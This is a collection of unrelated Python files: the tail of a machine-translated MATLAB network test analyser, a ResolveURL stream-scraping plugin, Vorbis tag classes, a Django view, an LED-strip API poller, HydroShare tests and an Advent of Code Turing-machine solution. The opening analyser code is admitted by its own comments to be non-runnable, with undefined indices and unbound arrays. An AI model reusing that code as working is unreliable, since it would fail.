    mean_packetloss=[]
    std_dev_packetloss=[]
    print('Starting work on:')
    print(file_names)
    for f in file_names:
        print('in loop, iterating through list of found files...')
        #current_file_name_with_ext=f
        #bare_file_name=strrep(current_file_name_with_ext,extension_loadfile,'')
        #temp_picture_file_name=strcat(bare_file_name,extension_imgfile)
        current_picture_file_name=strcat(f,'.jpg')
        matrix_to_process=load_octave_decoded_file_as_matrix(f)
        # parsed_data columns: 1=bitrate, 2=delay, 3=jitter, 4=packet loss
        # (MATLAB 1-based column convention; `[:,2]`-style indexing assumes
        # a matlabarray, not a plain Python list).
        parsed_data=process_single_testfile(matrix_to_process,current_picture_file_name,output_format)
        # NOTE(review): `ii` is undefined here (the MATLAB loop counter was
        # lost in translation) and indexing an empty list raises IndexError.
        mean_bitrate[ii]=mean(parsed_data)
        std_dev_bitrate[ii]=std(parsed_data)
        mean_delay[ii]=mean(parsed_data[:,2])
        std_dev_delay[ii]=std(parsed_data[:,2])
        mean_jitter[ii]=mean(parsed_data[:,3])
        std_dev_jitter[ii]=std(parsed_data[:,3])
        mean_packetloss[ii]=mean(parsed_data[:,4])
        std_dev_packetloss[ii]=std(parsed_data[:,4])
    # Axis limits for the three subplots, padded by the observed spread.
    # NOTE(review): `bitrate_interval` is undefined in this module.
    bitrate_of_test = get_test_bitrate(crosstraffic)
    s_bitrate=min(bitrate_of_test) - bitrate_interval
    e_bitrate=max(bitrate_of_test) + bitrate_interval
    s_mean_bitrate=min(mean_bitrate) - max(std_dev_bitrate)
    e_mean_bitrate=max(mean_bitrate) + max(std_dev_bitrate)
    s_mean_jitter=min(mean_jitter) - max(std_dev_jitter)
    e_mean_jitter=max(mean_jitter) + max(std_dev_jitter)
    s_mean_delay=min(mean_delay) - max(std_dev_delay)
    e_mean_delay=max(mean_delay) + max(std_dev_delay)
    axis_bitrate=(cat(s_bitrate,e_bitrate,s_mean_bitrate,e_mean_bitrate))
    axis_delay=(cat(s_bitrate,e_bitrate,sort(cat(round_(s_mean_delay) - 1,round_(e_mean_delay) + 1))))
    axis_jitter=(cat(s_bitrate,e_bitrate,s_mean_jitter,e_mean_jitter))
    print('\n\n\n*** START TESTDATA ***\n')
    print(bitrate_of_test)
    print(mean_bitrate)
    print(std_dev_bitrate)
    print('\n*** END TESTDATA ***\n\n\n')
    # Panel 1: mean throughput vs. test bitrate, with std-dev error bars.
    subplot(3,1,1)
    print(len(bitrate_of_test))
    print(len(mean_bitrate))
    print(len(std_dev_bitrate))
    errorbar(bitrate_of_test,mean_bitrate,std_dev_bitrate,'kx')
    title('mean throughput with standard deviation')
    xlabel('test bitrate [Mbps]')
    ylabel('bitrate value [Mbps]')
    print(axis_bitrate)
    axis(axis_bitrate)
    grid('on')
    # Panel 2: mean delay.
    subplot(3,1,2)
    errorbar(bitrate_of_test,mean_delay,std_dev_delay,'kx')
    title('mean delay with standard deviation')
    xlabel('test bitrate [Mbps]')
    ylabel('delay value [ms]')
    axis(axis_delay)
    grid('on')
    # Panel 3: mean jitter.
    subplot(3,1,3)
    errorbar(bitrate_of_test,mean_jitter,std_dev_jitter,'kx')
    title('mean jitter with standard deviation')
    xlabel('test bitrate [Mbps]')
    ylabel('jitter value [ms]')
    axis(axis_jitter)
    grid('on')
    # Render the combined figure to `overview.<format>` at 30x16 cm.
    aggregatedPicture=figure(1)
    set_(aggregatedPicture,'PaperUnits','centimeters')
    set_(aggregatedPicture,'PaperSize',cat(30,16))
    set_(aggregatedPicture,'PaperPosition',cat(0,0,30,16))
    set_(aggregatedPicture,'PaperOrientation','portrait')
    saveas(aggregatedPicture,overview_img_file,output_format)
    close(aggregatedPicture)
    clear('all')
    return

def process_single_testfile(matrix,current_picture_file_name,output_format):
    """Bucket one decoded log into 1-second intervals, plot
    throughput/delay/jitter/inter-departure histograms, and return the
    per-interval statistics.

    NOTE(review): `bitrate`, `delay`, `jitter` and `pktloss` are indexed
    before being bound (the MATLAB originals auto-grew arrays); runs only
    with the missing matlabarray shims in scope.

    Apparent column layout of `matrix` (1-based, from the expressions
    below -- confirm against the MATLAB sources): 2-4 = send h/m/s,
    5-7 = receive h/m/s, 8 = bytes per interval.
    """
    # Receive-side timestamps, converted to seconds relative to the first row.
    t_start=matrix[1][5] * 3600 + matrix[1][6] * 60 + matrix[1][7]
    print (matrix[:][5] * 3600 + matrix[:][6] * 60 + matrix[:][7])
    t_conv=(matrix[:][5] * 3600 + matrix[:][6] * 60 + matrix[:][7]) - t_start
    # Send-side timestamps, same treatment.
    t_start_s=matrix[1][2] * 3600 + matrix[1][3] * 60 + matrix[1][4]
    t_conv_s=(matrix[:][2] * 3600 + matrix[:][3] * 60 + matrix[:][4]) - t_start_s
    # jj: current 1-second bucket index; t_int: start time of that bucket.
    jj=1
    t_int=0
    bitrate[jj]=0
    delay[jj]=0
    jitter[jj]=0
    pktloss[jj]=0
    for ii in arange(1,len(matrix)).reshape(-1):
        if (t_conv[ii] - t_int >= 1):
            # Crossed a 1-second boundary: open a new bucket.
            jj=jj + 1
            t_int=t_conv[ii]
            bitrate[jj]=matrix[ii][8]
            delay[jj]=t_conv[ii] - t_conv_s[ii]
            if (ii > 1):
                # Gap in (what appears to be) a sequence counter = lost packets.
                pktloss[jj]=matrix[ii] - matrix[ii - 1] - 1
                jitter[jj]=t_conv[ii] - t_conv[ii - 1]
        else:
            # Same bucket: accumulate bytes, running-average delay/jitter.
            bitrate[jj]=bitrate[jj] + matrix[ii][8]
            delay[jj]=mean(cat(delay[jj],(t_conv[ii] - t_conv_s[ii])))
            if (ii > 1):
                pktloss[jj]=pktloss[jj] + matrix[ii] - matrix[ii - 1] - 1
                jitter[jj]=mean(cat(jitter[jj],(t_conv[ii] - t_conv[ii - 1])))
    # bytes/s -> Mbps (125000 bytes = 1 Mbit).
    bitrate=bitrate / 125000
    return_matrix=matlabarray(cat(bitrate.T,delay.T,jitter.T,pktloss.T))
    # Four-panel per-file figure: throughput, delay, jitter, inter-departure PDF.
    subplot(2,2,1)
    bitrate_u=copy(bitrate)
    plot(arange(0,jj - 2),bitrate_u[1:jj - 1],'-')
    title('Throughput')
    xlabel('time [s]')
    ylabel('[Mbps]')
    axis(cat(0,max(t_conv),0,round_(max(bitrate_u) * 1.125)))
    grid('on')
    subplot(2,2,2)
    plot(arange(0,len(delay) - 1),delay,'-')
    title('Delay')
    xlabel('time [s]')
    ylabel('[ms]')
    axis(cat(0,max(t_conv),min(delay) - 1e-05,max(delay)))
    grid('on')
    subplot(2,2,3)
    plot(arange(0,len(jitter) - 1),jitter,'-')
    title('Jitter')
    xlabel('time [s]')
    ylabel('[ms]')
    axis(cat(0,max(t_conv),min(jitter) - max(jitter) * 1.125,max(jitter) * 1.125))
    grid('on')
    subplot(2,2,4)
    d=diff(t_conv)
    m=max(d)
    hist(d)
    title('Inter-departure time Distribution')
    xlabel('time [s]')
    ylabel('Empirical PDF')
    grid('on')
    # Save the per-file figure at 22x18 cm.
    firstPicture=figure(1)
    set_(firstPicture,'PaperUnits','centimeters')
    set_(firstPicture,'PaperSize',cat(22,18))
    set_(firstPicture,'PaperPosition',cat(0,0,22,18))
    set_(firstPicture,'PaperOrientation','portrait')
    saveas(firstPicture,current_picture_file_name,output_format)
    close(firstPicture)
    # if (strcmp(log_type,'udp_rcv')):
    #     subplot(1,1,1)
    #     packetloss_picture=figure(1)
    #     set_(packetloss_picture,'PaperUnits','centimeters')
    #     set_(packetloss_picture,'PaperSize',cat(12,10))
    #     set_(packetloss_picture,'PaperPosition',cat(0,0,12,10))
    #     set_(packetloss_picture,'PaperOrientation','portrait')
    #     plot(arange(0,len(pktloss) - 1),pktloss,'-')
    #     title('Packet loss')
    #     xlabel('time [s]')
    #     ylabel('[pps]')
    #     axis(cat(sort(cat(0,max(t_conv))),sort(cat(round_(max(pktloss)) + 1,round_(min(pktloss)) - 1))))
    #     grid('on')
    #     saveas(packetloss_picture,strcat('pl_',current_picture_file_name),output_format)
    #     close(packetloss_picture)
    return return_matrix

# Ad-hoc driver left in by the conversion: processes a single hard-coded file.
crosstraffic = False
#process_complete_test_set(['/tmp/octave.dat'],'pdf',crosstraffic)
process_single_testfile(load_octave_decoded_file_as_matrix('/tmp/octave.dat'),'pic.jpg',"jpg")
"""
    Plugin for ResolveURL
    Copyright (C) 2020 gujal

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from resolveurl.plugins.__resolve_generic__ import ResolveGeneric
from resolveurl.plugins.lib import helpers


class OoglyResolver(ResolveGeneric):
    # Host metadata ResolveURL uses to route matching links to this resolver.
    name = "oogly.io"
    domains = ['oogly.io']
    pattern = r'(?://|\.)(oogly\.io)/(?:embed-)?([0-9a-zA-Z]+)'

    def get_media_url(self, host, media_id):
        """Scrape the embed page for the direct m3u8/mp4 stream URL."""
        embed_page = self.get_url(host, media_id)
        stream_patterns = [r'''file:\s*"(?P<url>[^"]+\.(?:m3u8|mp4))"''']
        return helpers.get_media_url(embed_page,
                                     patterns=stream_patterns,
                                     generic_patterns=False,
                                     referer=False)

    def get_url(self, host, media_id):
        """Build the canonical embed-page URL for this host and media id."""
        embed_template = 'https://{host}/embed-{media_id}.html'
        return self._default_get_url(host, media_id, template=embed_template)
from audio_pipeline.util import Tag
import re
from audio_pipeline.util import Exceptions


class BaseTag(Tag.Tag):
    """A Vorbis-comment tag.

    Mutagen stores Vorbis values as lists of strings; this adapter
    unwraps the first entry on read and re-wraps on write.
    """

    def extract(self):
        """Read the raw value from mutagen and unwrap the one-element list."""
        super().extract()
        if self._value is not None:
            self._value = self._value[0]

    def set(self, value=Tag.CurrentTag):
        """Serialize the current (or supplied) value into the mutagen dict.

        Lists are written element-wise; any other truthy value becomes a
        single-element list; a falsy value removes the tag entirely (Vorbis
        comments have no empty-tag representation).
        """
        if value is not Tag.CurrentTag:
            self.value = value
        if isinstance(self._value, list):
            self.mutagen[self.serialization_name] = [str(val) for val in self._value]
        elif self._value:
            self.mutagen[self.serialization_name] = [str(self._value)]
        else:
            if self.serialization_name in self.mutagen:
                self.mutagen.pop(self.serialization_name)


class NumberTag(Tag.NumberTagMixin, BaseTag):
    """A numeric tag (track/disc number) paired with a companion 'total' tag."""

    def __init__(self, total_tag, *args):
        self._total = None
        # serialization name of the companion total tag, e.g. 'tracktotal'
        self.serialization_total = total_tag
        super().__init__(*args)

    def extract(self):
        """Read both the number and, if present, its companion total."""
        # get the number
        super().extract()
        if self._value:
            self._value = int(self._value)
        # get the total
        if self.serialization_total in self.mutagen:
            self._total = int(self.mutagen[self.serialization_total][0])

    @property
    def value(self):
        # Return the stored number as-is.  The previous implementation gated
        # this on truthiness ("if self._value:"), which silently turned a
        # legitimate stored 0 into None.
        return self._value

    @value.setter
    def value(self, val):
        """Accept None, an int, or a string ('7' or 'num/total' form).

        Raises:
            Exceptions.InvalidTagValueError: for any unparsable value.
        """
        if val is None:
            self._value = None
        elif isinstance(val, int):
            self._value = val
        elif isinstance(val, str) and self._value_match.match(val):
            # valid-looking num/total string; keep only the number part
            self._value = int(val.split('/')[0])
        elif isinstance(val, str):
            try:
                self._value = int(val)
            except ValueError:
                raise Exceptions.InvalidTagValueError(str(val) + " is not a valid " + self.name)
        else:
            raise Exceptions.InvalidTagValueError(str(val) + " is not a valid " + self.name)


class DiscNumberTag(NumberTag):
    """Disc number; renders as 'num/total' when a total is known."""

    def __str__(self):
        if self._value and self._total:
            val = str(self._value) + "/" + str(self._total)
        elif self._value:
            val = str(self._value)
        else:
            val = ""
        return val


class ReleaseDateTag(Tag.ReleaseDateMixin, BaseTag):
    """Release date tag, normalized to the mixin's canonical form on creation."""

    def __init__(self, *args):
        super().__init__(*args)
        self._normalize()


class Format(Tag.MetadataFormat):
    """
    A static class used to extract and save Vorbis-formatted metadata tags.
    """

    # release-level serialization names
    _album = "album"
    _album_artist = "albumartist"
    _release_date = "date"
    _label = "label"
    _mbid = "mbid"
    _mbid_p = "musicbrainz_albumid"
    _country = "releasecountry"
    _release_type = "releasetype"
    _media_format = "media"

    # track-level serialization names
    _title = "title"
    _artist = "artist"
    _disc_total = "disctotal"
    _disc_total_picard = "totaldiscs"
    _disc_num = "discnumber"
    _track_total = "tracktotal"
    _track_total_picard = "totaltracks"
    _track_num = "tracknumber"
    _length = "Length"
    _acoustid = "ACOUSTID_ID"
    _track_mbid = 'MUSICBRAINZ_RELEASETRACKID'
    _recording_mbid = 'MUSICBRAINZ_TRACKID'

    ################
    # release-level tags
    ################

    @classmethod
    def album(cls, tags):
        tag = BaseTag(cls._album_name, cls._album, tags)
        return tag

    @classmethod
    def album_artist(cls, tags):
        tag = BaseTag(cls._album_artist_name, cls._album_artist, tags)
        return tag

    @classmethod
    def release_date(cls, tags):
        tag = ReleaseDateTag(cls._release_date_name, cls._release_date, tags)
        return tag

    @classmethod
    def label(cls, tags):
        tag = BaseTag(cls._label_name, cls._label, tags)
        return tag

    @classmethod
    def mbid(cls, tags):
        # Prefer the Picard-style serialization; fall back to the legacy name.
        tag = BaseTag(cls._mbid_name, cls._mbid_p, tags)
        if tag.value is None:
            tag = BaseTag(cls._mbid_name, cls._mbid, tags)
        return tag

    @classmethod
    def country(cls, tags):
        tag = BaseTag(cls._country_name, cls._country, tags)
        return tag

    @classmethod
    def release_type(cls, tags):
        tag = BaseTag(cls._type_name, cls._release_type, tags)
        return tag

    @classmethod
    def media_format(cls, tags):
        tag = BaseTag(cls._media_format_name, cls._media_format, tags)
        return tag

    ######################
    # track-level tags
    ######################

    @classmethod
    def title(cls, tags):
        tag = BaseTag(cls._title_name, cls._title, tags)
        return tag

    @classmethod
    def artist(cls, tags):
        tag = BaseTag(cls._artist_name, cls._artist, tags)
        return tag

    @classmethod
    def disc_num(cls, tags):
        # Prefer the Picard total tag; fall back to the plain Vorbis one.
        tag = DiscNumberTag(cls._disc_total_picard, cls._disc_num_name, cls._disc_num, tags)
        if tag.total is None:
            tag = DiscNumberTag(cls._disc_total, cls._disc_num_name, cls._disc_num, tags)
        return tag

    @classmethod
    def track_num(cls, tags):
        # Same fallback strategy as disc_num.
        tag = NumberTag(cls._track_total_picard, cls._track_num_name, cls._track_num, tags)
        if tag.total is None:
            tag = NumberTag(cls._track_total, cls._track_num_name, cls._track_num, tags)
        return tag

    @classmethod
    def acoustid(cls, tags):
        tag = BaseTag(cls._acoustid_name, cls._acoustid, tags)
        return tag

    @classmethod
    def recording_mbid(cls, tags):
        tag = BaseTag(cls._recording_mbid_name, cls._recording_mbid, tags)
        return tag

    @classmethod
    def track_mbid(cls, tags):
        tag = BaseTag(cls._track_mbid_name, cls._track_mbid, tags)
        return tag

    #########################
    # custom tags
    #########################

    @classmethod
    def custom_tag(cls, name, tags):
        """Look up *name* directly, falling back to the same name with
        whitespace replaced by underscores; persist under the plain name."""
        tag = BaseTag(name, name, tags)
        if not tag.value:
            # Raw string: the original "\s" relied on Python passing an
            # unknown escape through, a DeprecationWarning on modern Pythons.
            serialization_name = re.sub(r"\s", "_", name)
            under_tag = BaseTag(name, serialization_name, tags)
            tag.value = under_tag.value
        tag.save()
        return tag
from django.http import Http404
from django.shortcuts import render

from directory.forms import SearchForm


def home(request):
    """Render the landing page with a blank search form."""
    context = {'searchform': SearchForm()}
    return render(request, 'onigiri/index.html', context)
#!/usr/bin/env python
from raspledstrip.ledstrip import *
from raspledstrip.animation import *
from raspledstrip.color import Color
import requests
import json
import time
import sys
import traceback

# Things that should be configurable
ledCount = 32 * 5
api = 'http://lumiere.lighting/'
waitTime = 6


class Lumiere:
    """
    Class to handle getting light information.

    Polls the Lumiere API every `waitTime` seconds and, whenever a new
    color set is published, animates the change and paints the strip.
    """

    def __init__(self):
        """
        Constructor.
        """
        self.ledCount = ledCount
        self.base_url = api
        self.currentID = None
        self.ledArray = []
        self.waitTime = waitTime
        self.led = LEDStrip(ledCount)
        self.led.all_off()

    def listen(self):
        """
        Handles the continual checking.

        Runs forever; Ctrl-C/SystemExit propagate, any other error is
        logged and polling continues.
        """
        while True:
            try:
                self.queryLights()
                time.sleep(self.waitTime)
            except (KeyboardInterrupt, SystemExit):
                raise
            except Exception:
                # Narrowed from a bare `except:`; KI/SE are already
                # re-raised above, so visible behavior is unchanged.
                print(traceback.format_exc())

    def updateLights(self):
        """
        Change the lights: run the FireFlies transition, then paint the
        final color pattern.
        """
        self.fillArray()

        # Animate
        anim = FireFlies(self.led, self.ledArray, 1, 1, 0, self.led.lastIndex)
        for i in range(50):
            anim.step()
            self.led.update()

        # Final fill
        for li, l in enumerate(self.ledArray):
            self.led.set(li, l)
        self.led.update()

    def fillArray(self):
        """
        Fill up LED count with all the colors, cycling through the API's
        color list as needed.
        """
        self.ledArray = []
        length = len(self.current['colors'])
        # range(self.ledCount): the original `ledCount - 1` was an
        # off-by-one that left the last LED un-painted.
        for x in range(0, self.ledCount):
            r, g, b = self.hex_to_rgb(self.current['colors'][x % length])
            self.ledArray.append(Color(r, g, b))

    def queryLights(self):
        """
        Make request to API; repaint only when the record ID changed.
        """
        r = requests.get('%sapi/colors' % (self.base_url))
        self.current = r.json()

        # Only update if new record
        if self.currentID is None or self.currentID != self.current['_id']:
            self.currentID = self.current['_id']
            self.updateLights()

    def hex_to_rgb(self, value):
        """
        Turns hex value (e.g. '#ff0000') into an (r, g, b) tuple.
        """
        value = value.lstrip('#')
        lv = len(value)
        # Floor division keeps this correct on Python 3 too; on Python 2
        # (this file's target, given the old print statement it used)
        # `lv / 3` was already integer division.
        step = lv // 3
        return tuple(int(value[i:i + step], 16) for i in range(0, lv, step))


if __name__ == '__main__':
    lumiere = Lumiere()
    lumiere.listen()
from django.test import TestCase, TransactionTestCase
from django.contrib.auth.models import Group, User
from django.http import HttpRequest, QueryDict
from hs_core.hydroshare import resource
from hs_core import hydroshare
from hs_script_resource.models import ScriptSpecificMetadata, ScriptResource
from hs_script_resource.receivers import script_pre_create, script_metadata_pre_create_handler, script_metadata_pre_update_handler


class TestScriptResource(TransactionTestCase):
    """Tests for the ScriptResource type: its ScriptSpecificMetadata CRUD,
    its signal receivers, and bulk metadata update."""

    def setUp(self):
        """Create a user in the 'Hydroshare Author' group and an empty
        ScriptResource owned by that user for each test."""
        self.group, _ = Group.objects.get_or_create(name='Hydroshare Author')
        self.user = hydroshare.create_account(
            'scrawley@byu.edu',
            username='scrawley',
            first_name='Shawn',
            last_name='Crawley',
            superuser=False,
            groups=[self.group]
        )
        # numeric tolerance; kept for parity with sibling test suites
        self.allowance = 0.00001
        self.resScript = hydroshare.create_resource(
            resource_type='ScriptResource',
            owner=self.user,
            title='Test R Script Resource',
            keywords=['kw1', 'kw2']
        )

    def test_script_res_specific_metadata(self):
        """Create / uniqueness / update / delete of ScriptSpecificMetadata."""
        #######################
        # Class: ScriptSpecificMetadata
        #######################
        # no ScriptSpecificMetadata obj
        self.assertEqual(ScriptSpecificMetadata.objects.all().count(), 0)

        # create 1 ScriptSpecificMetadata obj with required params
        resource.create_metadata_element(self.resScript.short_id, 'ScriptSpecificMetadata', scriptLanguage='R',
                                         languageVersion='3.5', scriptVersion='1.0',
                                         scriptDependencies='None', scriptReleaseDate='2015-12-01 00:00',
                                         scriptCodeRepository='http://www.google.com')
        self.assertEqual(ScriptSpecificMetadata.objects.all().count(), 1)

        # may not create additional instance of ScriptSpecificMetadata
        # (the element is one-per-resource, so a second create must raise)
        with self.assertRaises(Exception):
            resource.create_metadata_element(self.resScript.short_id, 'ScriptSpecificMetadata', scriptLanguage='R',
                                             languageVersion='3.5', scriptVersion='1.0',
                                             scriptDependencies='None', scriptReleaseDate='12/01/2015',
                                             scriptCodeRepository='http://www.google.com')

        self.assertEqual(ScriptSpecificMetadata.objects.all().count(), 1)

        # update existing meta
        resource.update_metadata_element(self.resScript.short_id, 'ScriptSpecificMetadata',
                                         element_id=ScriptSpecificMetadata.objects.first().id,
                                         scriptLanguage='python', languageVersion='2.7')
        self.assertEqual(ScriptSpecificMetadata.objects.first().scriptLanguage, 'python')
        self.assertEqual(ScriptSpecificMetadata.objects.first().languageVersion, '2.7')

        # delete ScriptSpecificMetadata obj
        resource.delete_metadata_element(self.resScript.short_id, 'ScriptSpecificMetadata',
                                         element_id=ScriptSpecificMetadata.objects.first().id)
        self.assertEqual(ScriptSpecificMetadata.objects.all().count(), 0)

    def test_receivers(self):
        """Pre-create/pre-update signal handlers validate the POSTed form
        data and report validity via the returned dict."""
        request = HttpRequest()

        # ScriptSpecificMetadata
        request.POST = {'scriptLanguage': 'R', 'languageVersion': '3.5'}

        # valid POST data -> handler reports valid
        data = script_metadata_pre_create_handler(sender=ScriptResource,
                                                  element_name="ScriptSpecificMetadata",
                                                  request=request)
        self.assertTrue(data["is_valid"])

        # missing POST data -> handler reports invalid
        request.POST = None

        data = script_metadata_pre_create_handler(sender=ScriptResource,
                                                  element_name="ScriptSpecificMetadata",
                                                  request=request)
        self.assertFalse(data["is_valid"])

        # pre-create with no metadata seeds an empty scriptspecificmetadata dict
        data = script_pre_create(sender=ScriptResource, metadata=[], source_names=[], files=None)
        self.assertEqual(data[0]['scriptspecificmetadata'], {})

        # same valid/invalid round-trip for the pre-update handler
        request.POST = {'scriptLanguage': 'R', 'languageVersion': '3.5'}

        data = script_metadata_pre_update_handler(sender=ScriptResource,
                                                  element_name="ScriptSpecificMetadata",
                                                  request=request)
        self.assertTrue(data["is_valid"])

        request.POST = None

        data = script_metadata_pre_update_handler(sender=ScriptResource,
                                                  element_name="ScriptSpecificMetadata",
                                                  request=request)
        self.assertFalse(data["is_valid"])

    def test_bulk_metadata_update(self):
        """ScriptMetaData.update() handles both extended (script-specific)
        and core (creator) metadata in one call."""
        # here we are testing the update() method of the ScriptMetaData class

        # check that there are no extended metadata elements at this point
        self.assertEqual(self.resScript.metadata.program, None)

        # create program metadata
        self.resScript.metadata.update([{'scriptspecificmetadata': {'scriptLanguage': 'R',
                                                                    'languageVersion': '3.5',
                                                                    'scriptVersion': '1.0',
                                                                    'scriptDependencies': 'None',
                                                                    'scriptReleaseDate': '2015-12-01 00:00',
                                                                    'scriptCodeRepository':
                                                                        'http://www.google.com'}}],
                                       self.user)
        # check that there is now extended metadata elements at this point
        self.assertNotEqual(self.resScript.metadata.program, None)

        # test that we can also update core metadata using update()
        # there should be a creator element
        self.assertEqual(self.resScript.metadata.creators.count(), 1)
        self.resScript.metadata.update([{'creator': {'name': 'Second Creator'}},
                                        {'creator': {'name': 'Third Creator'}},
                                        {'scriptspecificmetadata': {'scriptVersion': '1.5'}}], self.user)
        # there should be 2 creators at this point (previously existed creator gets
        # delete as part of the update() call
        self.assertEqual(self.resScript.metadata.creators.count(), 2)

        # check that there is now extended metadata elements at this point
        self.assertNotEqual(self.resScript.metadata.program, None)
"""
--- Day 25: The Halting Problem --- (Advent of Code 2017)

Simulate a Turing machine: an infinite tape of 0/1 slots (all initially
0), a cursor, and a set of states.  For the value under the cursor, the
current state dictates what to write, which way to move, and which state
comes next.  After a prescribed number of steps, the "diagnostic
checksum" is the number of 1s on the tape.

The example blueprint from the puzzle (states A/B, 6 steps, checksum 3)
is TestTuringMachine; the real puzzle input (states A-F, 12,667,664
steps) is Part1TuringMachine.  Part two of the puzzle requires no
additional computation.
"""


class TuringMachine():
    """Base machine: tracks the current state, the cursor position, and
    the set of tape positions that currently hold a 1."""

    def __init__(self, state):
        self.state = state  # current state label, e.g. 'A'
        self.pos = 0        # cursor position on the infinite tape
        # Positions holding a 1.  A set makes the per-step membership test
        # and write O(1); the original list made each of the ~12.7 million
        # steps scan an ever-growing tape (quadratic overall).
        self.ones = set()

    def move(self):
        """Execute one step using the subclass's TRANSITIONS table."""
        value = 1 if self.pos in self.ones else 0
        move, next_state, op = self.TRANSITIONS[self.state][value]
        self._move(move, next_state, op)

    def _move(self, move, next_state=None, op=None):
        """Apply one transition.

        move: cursor delta (-1 left, +1 right).
        next_state: new state label, or None to keep the current one.
        op: 1 writes a 1, 0 writes a 0 (slot must currently hold a 1),
            None leaves the slot unchanged.
        """
        if next_state is not None:
            self.state = next_state
        if op == 1:
            self.ones.add(self.pos)
        elif op == 0:
            # Like the original list-based pop, this raises if the slot is
            # not actually 1 (KeyError now rather than ValueError).
            self.ones.remove(self.pos)
        self.pos += move


class TestTuringMachine(TuringMachine):
    """Two-state example machine from the puzzle statement."""

    # state -> (rule for value 0, rule for value 1);
    # each rule is the (move, next_state, write) triple fed to _move.
    TRANSITIONS = {
        'A': ((1, 'B', 1), (-1, 'B', 0)),
        'B': ((-1, 'A', 1), (1, 'A', None)),
    }


def test1():
    """The example machine reaches checksum 3 after 6 steps."""
    machine = TestTuringMachine('A')
    for i in range(6):
        machine.move()
    assert 3 == len(machine.ones)


class Part1TuringMachine(TuringMachine):
    """Six-state machine transcribed from the puzzle input."""

    TRANSITIONS = {
        'A': ((1, 'B', 1), (-1, 'C', 0)),
        'B': ((-1, 'A', 1), (1, 'D', None)),
        'C': ((-1, 'B', None), (-1, 'E', 0)),
        'D': ((1, 'A', 1), (1, 'B', 0)),
        'E': ((-1, 'F', 1), (-1, 'C', None)),
        'F': ((1, 'D', 1), (1, 'A', None)),
    }


def part1():
    """Run the puzzle machine for its prescribed step count and print the
    diagnostic checksum."""
    machine = Part1TuringMachine('A')
    for i in range(12667664):
        machine.move()
    print(len(machine.ones))


if __name__ == '__main__':
    # test1()
    part1()